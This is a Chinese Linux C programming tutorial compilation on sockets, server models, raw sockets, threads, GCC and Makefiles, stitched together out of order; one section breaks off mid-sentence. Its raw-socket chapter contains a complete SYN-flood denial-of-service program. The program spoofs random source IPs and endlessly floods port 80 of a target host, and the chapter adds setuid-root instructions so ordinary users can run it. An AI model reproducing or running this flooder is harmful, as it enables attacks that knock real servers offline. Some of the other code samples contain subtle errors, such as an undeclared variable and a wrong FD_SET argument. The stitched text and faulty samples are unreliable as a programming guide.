7.6 TCP连接的建立
TCP协议是一种可靠的连接,为了保证连接的可靠性,TCP的连接要分为几个步骤.我们把这
个连接过程称为"三次握手".
下面我们从一个实例来分析建立连接的过程.
第一步客户机向服务器发送一个TCP数据包,表示请求建立连接. 为此,客户端将数据包的
SYN位设置为1,并且设置序列号seq=1000(我们假设为1000).
第二步服务器收到了数据包,并从SYN位为1知道这是一个建立请求的连接.于是服务器也
向客户端发送一个TCP数据包.因为是响应客户机的请求,于是服务器设置ACK为1,sak_se
q=1001(1000+1)同时设置自己的序列号.seq=2000(我们假设为2000).
第三步客户机收到了服务器的TCP,并从ACK为1和ack_seq=1001知道是从服务器来的确认
信息.于是客户机也向服务器发送确认信息.客户机设置ACK=1,和ack_seq=2001,seq=100
1,发送给服务器.至此客户端完成连接.
最后一步服务器受到确认信息,也完成连接.
通过上面几个步骤,一个TCP连接就建立了.当然在建立过程中可能出现错误,不过TCP协议
可以保证自己去处理错误的.
说一说其中的一种错误.
听说过DOS吗?(可不是操作系统啊).今年春节的时候,美国的五大网站一起受到攻击.攻
击者用的就是DOS(拒绝式服务)方式.概括的说一下原理.
客户机先进行第一个步骤.服务器收到后,进行第二个步骤.按照正常的TCP连接,客户机
应该进行第三个步骤.
不过攻击者实际上并不进行第三个步骤.因为客户端在进行第一个步骤的时候,修改了自
己的IP地址,就是说将一个实际上不存在的IP填充在自己IP数据包的发送者的IP一栏.这
样因为服务器发的IP地址没有人接收,所以服务端会收不到第三个步骤的确认信号,这样
服务务端会在那边一直等待,直到超时.
这样当有大量的客户发出请求后,服务端会有大量等待,直到所有的资源被用光,而不能再
接收客户机的请求.
这样当正常的用户向服务器发出请求时,由于没有了资源而不能成功.于是就出现了春节
时所出现的情况.
----------------------------------------------------------------------------

网络编程(8)

8. 套接字选项
有时候我们要控制套接字的行为(如修改缓冲区的大小),这个时候我们就要控制套接字的
选项了.
8.1 getsockopt和setsockopt
int getsockopt(int sockfd,int level,int optname,void *optval,socklen_t *optl
en)
int setsockopt(int sockfd,int level,int optname,const void *optval,socklen_t
*optlen)
level指定控制套接字的层次.可以取三种值: 1)SOL_SOCKET:通用套接字选项. 2)IPPRO
TO_IP:IP选项. 3)IPPROTO_TCP:TCP选项.
optname指定控制的方式(选项的名称),我们下面详细解释
optval获得或者是设置套接字选项.根据选项名称的数据类型进行转换
选项名称 说明 数据类型
========================================================================
SOL_SOCKET
------------------------------------------------------------------------
SO_BROADCAST 允许发送广播数据 int
SO_DEBUG 允许调试 int
SO_DONTROUTE 不查找路由 int
SO_ERROR 获得套接字错误 int
SO_KEEPALIVE 保持连接 int
SO_LINGER 延迟关闭连接 struct linge
r
SO_OOBINLINE 带外数据放入正常数据流 int
SO_RCVBUF 接收缓冲区大小 int
SO_SNDBUF 发送缓冲区大小 int
SO_RCVLOWAT 接收缓冲区下限 int
SO_SNDLOWAT 发送缓冲区下限 int
SO_RCVTIMEO 接收超时 struct timev
al
SO_SNDTIMEO 发送超时 struct timev
al
SO_REUSERADDR 允许重用本地地址和端口 int
SO_TYPE 获得套接字类型 int
SO_BSDCOMPAT 与BSD系统兼容 int
==========================================================================
IPPROTO_IP
--------------------------------------------------------------------------
IP_HDRINCL 在数据包中包含IP首部 int
IP_OPTINOS IP首部选项 int
IP_TOS 服务类型
IP_TTL 生存时间 int
==========================================================================
IPPRO_TCP
--------------------------------------------------------------------------
TCP_MAXSEG TCP最大数据段的大小 int
TCP_NODELAY 不使用Nagle算法 int
=========================================================================
关于这些选项的详细情况请查看 Linux Programmer's Manual
8.2 ioctl
ioctl可以控制所有的文件描述符的情况,这里介绍一下控制套接字的选项.
int ioctl(int fd,int req,...)
==========================================================================
ioctl的控制选项
--------------------------------------------------------------------------
SIOCATMARK 是否到达带外标记 int
FIOASYNC 异步输入/输出标志 int
FIONREAD 缓冲区可读的字节数 int
==========================================================================
详细的选项请用 man ioctl_list 查看.
--

网络编程(9)

9. 服务器模型
学习过《软件工程》吧.软件工程可是每一个程序员"必修"的课程啊.如果你没有学习过
, 建议你去看一看. 在这一章里面,我们一起来从软件工程的角度学习网络编程的思想.
在我们写程序之前, 我们都应该从软件工程的角度规划好我们的软件,这样我们开发软件
的效率才会高. 在网络程序里面,一般的来说都是许多客户机对应一个服务器.为了处理
客户机的请求, 对服务端的程序就提出了特殊的要求.我们学习一下目前最常用的服务器
模型.
循环服务器:循环服务器在同一个时刻只可以响应一个客户端的请求
并发服务器:并发服务器在同一个时刻可以响应多个客户端的请求
9.1 循环服务器:UDP服务器
UDP循环服务器的实现非常简单:UDP服务器每次从套接字上读取一个客户端的请求,处理
, 然后将结果返回给客户机.
可以用下面的算法来实现.
socket(...);
bind(...);
while(1)
{
recvfrom(...);
process(...);
sendto(...);
}
因为UDP是非面向连接的,没有一个客户端可以老是占住服务端. 只要处理过程不是死循
环, 服务器对于每一个客户机的请求总是能够满足.
9.2 循环服务器:TCP服务器
TCP循环服务器的实现也不难:TCP服务器接受一个客户端的连接,然后处理,完成了这个客
户的所有请求后,断开连接.
算法如下:
socket(...);
bind(...);
listen(...);
while(1)
{
accept(...);
while(1)
{
read(...);
process(...);
write(...);
}
close(...);
}
TCP循环服务器一次只能处理一个客户端的请求.只有在这个客户的所有请求都满足后,
服务器才可以继续后面的请求.这样如果有一个客户端占住服务器不放时,其它的客户机
都不能工作了.因此,TCP服务器一般很少用循环服务器模型的.
9.3 并发服务器:TCP服务器
为了弥补循环TCP服务器的缺陷,人们又想出了并发服务器的模型. 并发服务器的思想是
每一个客户机的请求并不由服务器直接处理,而是服务器创建一个 子进程来处理.
算法如下:
socket(...);
bind(...);
listen(...);
while(1)
{
accept(...);
if(fork(..)==0)
{
while(1)
{
read(...);
process(...);
write(...);
}
close(...);
exit(...);
}
close(...);
}
TCP并发服务器可以解决TCP循环服务器客户机独占服务器的情况. 不过也同时带来了一
个不小的问题.为了响应客户机的请求,服务器要创建子进程来处理. 而创建子进程是一
种非常消耗资源的操作.
9.4 并发服务器:多路复用I/O
为了解决创建子进程带来的系统资源消耗,人们又想出了多路复用I/O模型.
首先介绍一个函数select
int select(int nfds,fd_set *readfds,fd_set *writefds,
fd_set *except fds,struct timeval *timeout)
void FD_SET(int fd,fd_set *fdset)
void FD_CLR(int fd,fd_set *fdset)
void FD_ZERO(fd_set *fdset)
int FD_ISSET(int fd,fd_set *fdset)
一般的来说当我们在向文件读写时,进程有可能在读写出阻塞,直到一定的条件满足. 比
如我们从一个套接字读数据时,可能缓冲区里面没有数据可读(通信的对方还没有 发送数
据过来),这个时候我们的读调用就会等待(阻塞)直到有数据可读.如果我们不 希望阻塞
,我们的一个选择是用select系统调用. 只要我们设置好select的各个参数,那么当文件
可以读写的时候select回"通知"我们 说可以读写了. readfds所有要读的文件文件描述
符的集合
writefds所有要的写文件文件描述符的集合
exceptfds其他的服要向我们通知的文件描述符
timeout超时设置.
nfds所有我们监控的文件描述符中最大的那一个加1
在我们调用select时进程会一直阻塞直到以下的一种情况发生. 1)有文件可以读.2)有文
件可以写.3)超时所设置的时间到.
为了设置文件描述符我们要使用几个宏. FD_SET将fd加入到fdset
FD_CLR将fd从fdset里面清除
FD_ZERO从fdset中清除所有的文件描述符
FD_ISSET判断fd是否在fdset集合中
使用select的一个例子
int use_select(int *readfd,int n)
{
fd_set my_readfd;
int maxfd;
int i;
maxfd=readfd[0];
for(i=1;i<n;i++)
if(readfd[i]>maxfd) maxfd=readfd[i];
while(1)
{
/* 将所有的文件描述符加入 */
FD_ZERO(&my_readfd);
for(i=0;i<n;i++)
FD_SET(readfd[i],*my_readfd);
/* 进程阻塞 */
select(maxfd+1,& my_readfd,NULL,NULL,NULL);
/* 有东西可以读了 */
for(i=0;i<n;i++)
if(FD_ISSET(readfd[i],&my_readfd))
{
/* 原来是我可以读了 */
we_read(readfd[i]);
}
}
}
使用select后我们的服务器程序就变成了.
初始话(socket,bind,listen);
while(1)
{
设置监听读写文件描述符(FD_*);
调用select;
如果是倾听套接字就绪,说明一个新的连接请求建立
{
建立连接(accept);
加入到监听文件描述符中去;
}
否则说明是一个已经连接过的描述符
{
进行操作(read或者write);
}
}
多路复用I/O可以解决资源限制的问题.着模型实际上是将UDP循环模型用在了TCP上面.
这也就带来了一些问题.如由于服务器依次处理客户的请求,所以可能会导致有的客户 会
等待很久.
9.5 并发服务器:UDP服务器
人们把并发的概念用于UDP就得到了并发UDP服务器模型. 并发UDP服务器模型其实是简单
的.和并发的TCP服务器模型一样是创建一个子进程来处理的 算法和并发的TCP模型一样
..
除非服务器在处理客户端的请求所用的时间比较长以外,人们实际上很少用这种模型.
9.6 一个并发TCP服务器实例
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <errno.h>
#define MY_PORT 8888
int main(int argc ,char **argv)
{
int listen_fd,accept_fd;
struct sockaddr_in client_addr;
int n;
if((listen_fd=socket(AF_INET,SOCK_STREAM,0))<0)
{
printf("Socket Error:%s\n\a",strerror(errno));
exit(1);
}
bzero(&client_addr,sizeof(struct sockaddr_in));
client_addr.sin_family=AF_INET;
client_addr.sin_port=htons(MY_PORT);
client_addr.sin_addr.s_addr=htonl(INADDR_ANY);
n=1;
/* 如果服务器终止后,服务器可以第二次快速启动而不用等待一段时间 */
setsockopt(listen_fd,SOL_SOCKET,SO_REUSEADDR,&n,sizeof(int));
if(bind(listen_fd,(struct sockaddr *)&client_addr,sizeof(client_addr))<0)
{
printf("Bind Error:%s\n\a",strerror(errno));
exit(1);
}
listen(listen_fd,5);
while(1)
{
accept_fd=accept(listen_fd,NULL,NULL);
if((accept_fd<0)&&(errno==EINTR))
continue;
else if(accept_fd<0)
{
printf("Accept Error:%s\n\a",strerror(errno));
continue;
}
if((n=fork())==0)
{
/* 子进程处理客户端的连接 */
char buffer[1024];
close(listen_fd);
n=read(accept_fd,buffer,1024);
write(accept_fd,buffer,n);
close(accept_fd);
exit(0);
}
else if(n<0)
printf("Fork Error:%s\n\a",strerror(errno));
close(accept_fd);
}
}
你可以用我们前面写客户端程序来调试着程序,或者是用来telnet调试
--

网络编程(10)

10. 原始套接字
我们在前面已经学习过了网络程序的两种套接字(SOCK_STREAM,SOCK_DRAGM).在这一章
里面我们一起来学习另外一种套接字--原始套接字(SOCK_RAW). 应用原始套接字,我们可
以编写出由TCP和UDP套接字不能够实现的功能. 注意原始套接字只能够由有root权限的
人创建.
10.1 原始套接字的创建
int sockfd(AF_INET,SOCK_RAW,protocol)
可以创建一个原始套接字.根据协议的类型不同我们可以创建不同类型的原始套接字 比
如:IPPROTO_ICMP,IPPROTO_TCP,IPPROTO_UDP等等.详细的情况查看 <netinet/in.h> 下
面我们以一个实例来说明原始套接字的创建和使用
10.2 一个原始套接字的实例
还记得DOS是什么意思吗?在这里我们就一起来编写一个实现DOS的小程序. 下面是程序的
源代码
/******************** DOS.c *****************/
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <netdb.h>
#define DESTPORT 80 /* 要攻击的端口(WEB) */
#define LOCALPORT 8888
void send_tcp(int sockfd,struct sockaddr_in *addr);
unsigned short check_sum(unsigned short *addr,int len);
int main(int argc,char **argv)
{
int sockfd;
struct sockaddr_in addr;
struct hostent *host;
int on=1;
if(argc!=2)
{
fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
exit(1);
}
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(DESTPORT);
if(inet_aton(argv[1],&addr.sin_addr)==0)
{
host=gethostbyname(argv[1]);
if(host==NULL)
{
fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
exit(1);
}
addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
}
/**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/
sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
exit(1);
}
/******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/
setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
/**** 没有办法,只用超级护用户才可以使用原始套接字 *********/
setuid(getpid());
/********* 发送炸弹了!!!! ****/
send_tcp(sockfd,&addr);
}
/******* 发送炸弹的实现 *********/
void send_tcp(int sockfd,struct sockaddr_in *addr)
{
char buffer[100]; /**** 用来放置我们的数据包 ****/
struct ip *ip;
struct tcphdr *tcp;
int head_len;
/******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/
head_len=sizeof(struct ip)+sizeof(struct tcphdr);
bzero(buffer,100);
/******** 填充IP数据包的头部,还记得IP的头格式吗? ******/
ip=(struct ip *)buffer;
ip->ip_v=IPVERSION; /** 版本一般的是 4 **/
ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/
ip->ip_tos=0; /** 服务类型 **/
ip->ip_len=htons(head_len); /** IP数据包的长度 **/
ip->ip_id=0; /** 让系统去填写吧 **/
ip->ip_off=0; /** 和上面一样,省点时间 **/
ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/
ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/
ip->ip_sum=0; /** 校验和让系统去做 **/
ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/
/******* 开始填写TCP数据包 *****/
tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
tcp->source=htons(LOCALPORT);
tcp->dest=addr->sin_port; /** 目的端口 **/
tcp->seq=random();
tcp->ack_seq=0;
tcp->doff=5;
tcp->syn=1; /** 我要建立连接 **/
tcp->check=0;
/** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/
while(1)
{
/** 你不知道我是从那里来的,慢慢的去等吧! **/
ip->ip_src.s_addr=random();
/** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */
/** 下面这条可有可无 */
tcp->check=check_sum((unsigned short *)tcp,
sizeof(struct tcphdr));
sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
}
}
/* 下面是首部校验和的算法,偷了别人的 */
unsigned short check_sum(unsigned short *addr,int len)
{
register int nleft=len;
register int sum=0;
register short *w=addr;
short answer=0;
while(nleft>1)
{
sum+=*w++;
nleft-=2;
}
if(nleft==1)
{
*(unsigned char *)(&answer)=*(unsigned char *)w;
sum+=answer;
}
sum=(sum>>16)+(sum&0xffff);
sum+=(sum>>16);
answer=~sum;
return(answer);
}
编译一下,拿localhost做一下实验,看看有什么结果.(千万不要试别人的啊). 为了让普
通用户可以运行这个程序,我们应该将这个程序的所有者变为root,且 设置setuid位
[root@hoyt /root]#chown root DOS
[root@hoyt /root]#chmod +s DOS
10.3 总结
原始套接字和一般的套接字不同的是以前许多由系统做的事情,现在要由我们自己来做了
.. 不过这里面是不是有很多的乐趣呢. 当我们创建了一个TCP套接字的时候,我们只是负
责把我们要发送的内容(buffer)传递给了系统. 系统在收到我们的数据后,回自动的调用
相应的模块给数据加上TCP头部,然后加上IP头部. 再发送出去.而现在是我们自己创建各
个的头部,系统只是把它们发送出去. 在上面的实例中,由于我们要修改我们的源IP地址
,所以我们使用了setsockopt函数,如果我们只是修改TCP数据,那么IP数据一样也可以由
系统来创建的.
--

网络编程(11)

11. 后记
总算完成了网络编程这个教程.算起来我差不多写了一个星期,原来以为写这个应该是
一件 不难的事,做起来才知道原来有很多的地方都比我想象的要难.我还把很多的东西都
省略掉了 不过写完了这篇教程以后,我好象对网络的认识又增加了一步.
如果我们只是编写一般的 网络程序还是比较容易的,但是如果我们想写出比较好的网
络程序我们还有着遥远的路要走. 网络程序一般的来说都是多进程加上多线程的.为了处
理好他们内部的关系,我们还要学习 进程之间的通信.在网络程序里面有着许许多多的突
发事件,为此我们还要去学习更高级的 事件处理知识.现在的信息越来越多了,为了处理
好这些信息,我们还要去学习数据库. 如果要编写出有用的黑客软件,我们还要去熟悉各
种网络协议.总之我们要学的东西还很多很多.
看一看外国的软件水平,看一看印度的软件水平,宝岛台湾的水平,再看一看我们自己的
软件水平大家就会知道了什么叫做差距.我们现在用的软件有几个是我们中国人自己编
写的.
不过大家不要害怕,不用担心.只要我们还是清醒的,还能够认清我们和别人的差距, 我
们就还有希望. 毕竟我们现在还年轻.只要我们努力,认真的去学习,我们一定能够学好的
..我们就可以追上别人直到超过别人!
相信一点:
别人可以做到的我们一样可以做到,而且可以比别人做的更好!
勇敢的年轻人,为了我们伟大祖国的软件产业,为了祖国的未来,努力的去奋斗吧!祖国
会记住你们的!
hoyt
11.1 参考资料
<<实用UNIX编程>>---机械工业出版社.
<<Linux网络编程>>--清华大学出版社.

9)Linux下C开发工具介绍

Linux的发行版中包含了很多软件开发工具. 它们中的很多是用于 C 和 C++应用程序开发
的. 本文介绍了在 Linux 下能用于 C 应用程序开发和调试的工具. 本文的主旨是介绍如
何在 Linux 下使用 C 编译器和其他 C 编程工具, 而非 C 语言编程的教程.

GNU C 编译器
GNU C 编译器(GCC)是一个全功能的 ANSI C 兼容编译器. 如果你熟悉其他操作系统或硬
件平台上的一种 C 编译器, 你将能很快地掌握 GCC. 本节将介绍如何使用 GCC 和一些
GCC 编译器最常用的选项.

使用 GCC
通常后跟一些选项和文件名来使用 GCC 编译器. gcc 命令的基本用法如下:

gcc [options] [filenames]
命令行选项指定的操作将在命令行上每个给出的文件上执行. 下一小节将叙述一些你会最
常用到的选项.

GCC 选项
GCC 有超过100个的编译选项可用. 这些选项中的许多你可能永远都不会用到, 但一些主
要的选项将会频繁用到. 很多的 GCC 选项包括一个以上的字符. 因此你必须为每个选项
指定各自的连字符, 并且就象大多数 Linux 命令一样你不能在一个单独的连字符后跟一
组选项. 例如, 下面的两个命令是不同的:

gcc -p -g test.c

gcc -pg test.c
第一条命令告诉 GCC 编译 test.c 时为 prof 命令建立剖析(profile)信息并且把调试信
息加入到可执行的文件里. 第二条命令只告诉 GCC 为 gprof 命令建立剖析信息.

当你不用任何选项编译一个程序时, GCC 将会建立(假定编译成功)一个名为 a.out 的可
执行文件. 例如, 下面的命令将在当前目录下产生一个叫 a.out 的文件:

gcc test.c
你能用 -o 编译选项来为将产生的可执行文件指定一个文件名来代替 a.out. 例如, 将一
个叫 count.c 的 C 程序编译为名叫 count 的可执行文件, 你将输入下面的命令:

gcc -o count count.c

------------------------------------------------------------------------------
--

注意: 当你使用 -o 选项时, -o 后面必须跟一个文件名.

------------------------------------------------------------------------------
--

GCC 同样有指定编译器处理多少的编译选项. -c 选项告诉 GCC 仅把源代码编译为目标代
码而跳过汇编和连接的步骤. 这个选项使用的非常频繁因为它使得编译多个 C 程序时速
度更快并且更易于管理. 缺省时 GCC 建立的目标代码文件有一个 .o 的扩展名.

-S 编译选项告诉 GCC 在为 C 代码产生了汇编语言文件后停止编译. GCC 产生的汇编语
言文件的缺省扩展名是 .s . -E 选项指示编译器仅对输入文件进行预处理. 当这个选项
被使用时, 预处理器的输出被送到标准输出而不是储存在文件里.

优 化 选 项
当你用 GCC 编译 C 代码时, 它会试着用最少的时间完成编译并且使编译后的代码易于调
试. 易于调试意味着编译后的代码与源代码有同样的执行次序, 编译后的代码没有经过优
化. 有很多选项可用于告诉 GCC 在耗费更多编译时间和牺牲易调试性的基础上产生更小
更快的可执行文件. 这些选项中最典型的是-O 和 -O2 选项.

-O 选项告诉 GCC 对源代码进行基本优化. 这些优化在大多数情况下都

　7)Linux程序设计入门--线程操作
前言:Linux下线程的创建
介绍在Linux下线程的创建和基本的使用. Linux下的线程是一个非常复杂的问题,由
于我对线程的学习不时很好,我在这里只是简单的介绍线程的创建和基本的使用,关于线
程的高级使用(如线程的属性,线程的互斥,线程的同步等等问题)可以参考我后面给出的
资料. 现在关于线程的资料在网络上可以找到许多英文资料,后面我罗列了许多链接,对
线程的高级属性感兴趣的话可以参考一下. 等到我对线程的了解比较深刻的时候,我回来
完成这篇文章.如果您对线程了解的详尽我也非常高兴能够由您来完善.
先介绍什么是线程.我们编写的程序大多数可以看成是单线程的.就是程序是按照一定的
顺序来执行.如果我们使用线程的话,程序就会在我们创建线成的地方分叉,变成两个"程
序"在执行.粗略的看来好象和子进程差不多的,其实不然.子进程是通过拷贝父进程的地
址空间来执行的.而线程是通过共享程序代码来执行的,讲的通俗一点就是线程的相同的
代码会被执行几次.使用线程的好处是可以节省资源,由于线程是通过共享代码的,所以没
有进程调度那么复杂.
线程的创建和使用
线程的创建是用下面的几个函数来实现的.
#include <pthread.h>
int pthread_create(pthread_t *thread,pthread_attr_t *attr,
void *(*start_routine)(void *),void *arg);
void pthread_exit(void *retval);
int pthread_join(pthread *thread,void **thread_return);
pthread_create创建一个线程,thread是用来表明创建线程的ID,attr指出线程创建时候
的属性,我们用NULL来表明使用缺省属性.start_routine函数指针是线程创建成功后开始
执行的函数,arg是这个函数的唯一一个参数.表明传递给start_routine的参数. pthrea
d_exit函数和exit函数类似用来退出线程.这个函数结束线程,释放函数的资源,并在最后
阻塞,直到其他线程使用pthread_join函数等待它.然后将*retval的值传递给**thread_
return.由于这个函数释放所以的函数资源,所以retval不能够指向函数的局部变量. pt
hread_join和wait调用一样用来等待指定的线程. 下面我们使用一个实例来解释一下使
用方法.在实践中,我们经常要备份一些文件.下面这个程序可以实现当前目录下的所有文
件备份.备份后的后缀名为bak
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <pthread.h>
#include <dirent.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#define BUFFER 512
struct copy_file {
int infile;
int outfile;
};
void *copy(void *arg)
{
int infile,outfile;
int bytes_read,bytes_write,*bytes_copy_p;
char buffer[BUFFER],*buffer_p;
struct copy_file *file=(struct copy_file *)arg;
infile=file->infile;
outfile=file->outfile;
/* 因为线程退出时,所有的变量空间都要被释放,所以我们只好自己分配内存了 */
if((bytes_copy_p=(int *)malloc(sizeof(int)))==NULL) pthread_exit(NULL);
bytes_read=bytes_write=0;
*bytes_copy_p=0;
/* 还记得怎么拷贝文件吗 */
while((bytes_read=read(infile,buffer,BUFFER))!=0)
{
if((bytes_read==-1)&&(errno!=EINTR))break;
else if(bytes_read>0)
{
buffer_p=buffer;
while((bytes_write=write(outfile,buffer_p,bytes_read))!=0)
{
if((bytes_write==-1)&&(errno!=EINTR))break;
else if(bytes_write==bytes_read)break;
else if(bytes_write>0)
{
buffer_p+=bytes_write;
bytes_read-=bytes_write;
}
}
if(bytes_write==-1)break;
*bytes_copy_p+=bytes_read;
}
}
close(infile);
close(outfile);
pthread_exit(bytes_copy_p);
}
int main(int argc,char **argv)
{
pthread_t *thread;
struct copy_file *file;
int byte_copy,*byte_copy_p,num,i,j;
char filename[BUFFER];
struct dirent **namelist;
struct stat filestat;
/* 得到当前路径下面所有的文件(包含目录)的个数 */
if((num=scandir(".",&namelist,0,alphasort))<0)
{
fprintf(stderr,"Get File Num Error:%s\n\a",strerror(errno));
exit(1);
}
/* 给线程分配空间,其实没有必要这么多的 */
if(((thread=(pthread_t *)malloc(sizeof(pthread_t)*num))==NULL)||
((file=(struct copy_file *)malloc(sizeof(struct copy_file)*num))==NULL)
)
{
fprintf(stderr,"Out Of Memory!\n\a");
exit(1);
}

for(i=0,j=0;i<num;i++)
{
memset(filename,'\0',BUFFER);
strcpy(filename,namelist[i]->d_name);
if(stat(filename,&filestat)==-1)
{
fprintf(stderr,"Get File Information:%s\n\a",strerror(errno));
exit(1);
}
/* 我们忽略目录 */
if(!S_ISREG(filestat.st_mode))continue;
if((file[j].infile=open(filename,O_RDONLY))<0)
{
fprintf(stderr,"Open %s Error:%s\n\a",filename,strerror(errno));
continue;
}
strcat(filename,".bak");
if((file[j].outfile=open(filename,O_WRONLY|O_CREAT,S_IRUSR|S_IWUSR))
<0)
{
fprintf(stderr,"Creat %s Error:%s\n\a",filename,strerror(errno
));
continue;
}
/* 创建线程,进行文件拷贝 */
if(pthread_create(&thread[j],NULL,copy,(void *)&file[j])!=0)
fprintf(stderr,"Create Thread[%d] Error:%s\n\a",i,strerror(errno));
j++;
}
byte_copy=0;
for(i=0;i<j;i++)
{
/* 等待线程结束 */
if(pthread_join(thread[i],(void **)&byte_copy_p)!=0)
fprintf(stderr,"Thread[%d] Join Error:%s\n\a",
i,strerror(errno));
else
{
if(bytes_copy_p==NULL)continue;
printf("Thread[%d] Copy %d bytes\n\a",i,*byte_copy_p);
byte_copy+=*byte_copy_p;
/* 释放我们在copy函数里面创建的内存 */
free(byte_copy_p);
}
}
printf("Total Copy Bytes %d\n\a",byte_copy);
free(thread);
free(file);
exit(0);
}
线程的介绍就到这里了,关于线程的其他资料可以查看下面这写链接.
Getting Started With POSIX Threads
The LinuxThreads library

　linux操作系统下c语言编程入门
(一)目录介绍

1)Linux程序设计入门--基础知识
2)Linux程序设计入门--进程介绍
3)Linux程序设计入门--文件操作
4)Linux程序设计入门--时间概念
5)Linux程序设计入门--信号处理
6)Linux程序设计入门--消息管理
7)Linux程序设计入门--线程操作
8)Linux程序设计入门--网络编程
9)Linux下C开发工具介绍

(二)具体内容

1)Linux程序设计入门--基础知识
Linux下C语言编程基础知识
前言:
这篇文章介绍在LINUX下进行C语言编程所需要的基础知识.在这篇文章当中,我们将
会学到以下内容:
源程序编译
Makefile的编写
程序库的链接
程序的调试
头文件和系统求助
----------------------------------------------------------------------------
----
1.源程序的编译
在Linux下面,如果要编译一个C语言源程序,我们要使用GNU的gcc编译器. 下面我们
以一个实例来说明如何使用gcc编译器.
假设我们有下面一个非常简单的源程序(hello.c):
int main(int argc,char **argv)
{
printf("Hello Linux\n");
}
要编译这个程序,我们只要在命令行下执行:
gcc -o hello hello.c
gcc 编译器就会为我们生成一个hello的可执行文件.执行./hello就可以看到程序的输出
结果了.命令行中 gcc表示我们是用gcc来编译我们的源程序,-o 选项表示我们要求编译
器给我们输出的可执行文件名为hello 而hello.c是我们的源程序文件.
gcc编译器有许多选项,一般来说我们只要知道其中的几个就够了. -o选项我们已经知道
了,表示我们要求输出的可执行文件名. -c选项表示我们只要求编译器输出目标代码,而
不必要输出可执行文件. -g选项表示我们要求编译器在编译的时候提供我们以后对程序
进行调试的信息.
知道了这三个选项,我们就可以编译我们自己所写的简单的源程序了,如果你想要知道更
多的选项,可以查看gcc的帮助文档,那里有着许多对其它选项的详细说明.
2.Makefile的编写
假设我们有下面这样的一个程序,源代码如下:
/* main.c */
#include "mytool1.h"
#include "mytool2.h"
int main(int argc,char **argv)
{
mytool1_print("hello");
mytool2_print("hello");
}
/* mytool1.h */
#ifndef _MYTOOL_1_H
#define _MYTOOL_1_H
void mytool1_print(char *print_str);
#endif
/* mytool1.c */
#include "mytool1.h"
void mytool1_print(char *print_str)
{
printf("This is mytool1 print %s\n",print_str);
}
/* mytool2.h */
#ifndef _MYTOOL_2_H
#define _MYTOOL_2_H
void mytool2_print(char *print_str);
#endif
/* mytool2.c */
#include "mytool2.h"
void mytool2_print(char *print_str)
{
printf("This is mytool2 print %s\n",print_str);
}
当然由于这个程序是很短的我们可以这样来编译
gcc -c main.c
gcc -c mytool1.c
gcc -c mytool2.c
gcc -o main main.o mytool1.o mytool2.o
这样的话我们也可以产生main程序,而且也不时很麻烦.但是如果我们考虑一下如果有一
天我们修改了其中的一个文件(比如说mytool1.c)那么我们难道还要重新输入上面的命令
?也许你会说,这个很容易解决啊,我写一个SHELL脚本,让她帮我去完成不就可以了.是的
对于这个程序来说,是可以起到作用的.但是当我们把事情想的更复杂一点,如果我们的程
序有几百个源程序的时候,难道也要编译器重新一个一个的去编译?
为此,聪明的程序员们想出了一个很好的工具来做这件事情,这就是make.我们只要执行以
下make,就可以把上面的问题解决掉.在我们执行make之前,我们要先编写一个非常重要的
文件.--Makefile.对于上面的那个程序来说,可能的一个Makefile的文件是:
# 这是上面那个程序的Makefile文件
main:main.o mytool1.o mytool2.o
gcc -o main main.o mytool1.o mytool2.o
main.o:main.c mytool1.h mytool2.h
gcc -c main.c
mytool1.o:mytool1.c mytool1.h
gcc -c mytool1.c
mytool2.o:mytool2.c mytool2.h
gcc -c mytool2.c
有了这个Makefile文件,不过我们什么时候修改了源程序当中的什么文件,我们只要执行
make命令,我们的编译器都只会去编译和我们修改的文件有关的文件,其它的文件她连理
都不想去理的.
下面我们学习Makefile是如何编写的.
在Makefile中也#开始的行都是注释行.Makefile中最重要的是描述文件的依赖关系的说
明.一般的格式是:
target: components
TAB rule
第一行表示的是依赖关系.第二行是规则.
比如说我们上面的那个Makefile文件的第二行
main:main.o mytool1.o mytool2.o
表示我们的目标(target)main的依赖对象(components)是main.o mytool1.o mytool2.o
当倚赖的对象在目标修改后修改的话,就要去执行规则一行所指定的命令.就象我们的上
面那个Makefile第三行所说的一样要执行 gcc -o main main.o mytool1.o mytool2.o
注意规则一行中的TAB表示那里是一个TAB键
Makefile有三个非常有用的变量.分别是$@,$^,$<代表的意义分别是:
$@--目标文件,$^--所有的依赖文件,$<--第一个依赖文件.
如果我们使用上面三个变量,那么我们可以简化我们的Makefile文件为:
# 这是简化后的Makefile
main:main.o mytool1.o mytool2.o
gcc -o $@ $^
main.o:main.c mytool1.h mytool2.h
gcc -c $<
mytool1.o:mytool1.c mytool1.h
gcc -c $<
mytool2.o:mytool2.c mytool2.h
gcc -c $<
经过简化后我们的Makefile是简单了一点,不过人们有时候还想简单一点.这里我们学习
一个Makefile的缺省规则
..c.o:
gcc -c $<
这个规则表示所有的 .o文件都是依赖与相应的.c文件的.例如mytool.o依赖于mytool.c
这样Makefile还可以变为:
# 这是再一次简化后的Makefile
main:main.o mytool1.o mytool2.o
gcc -o $@ $^
..c.o:
gcc -c $<
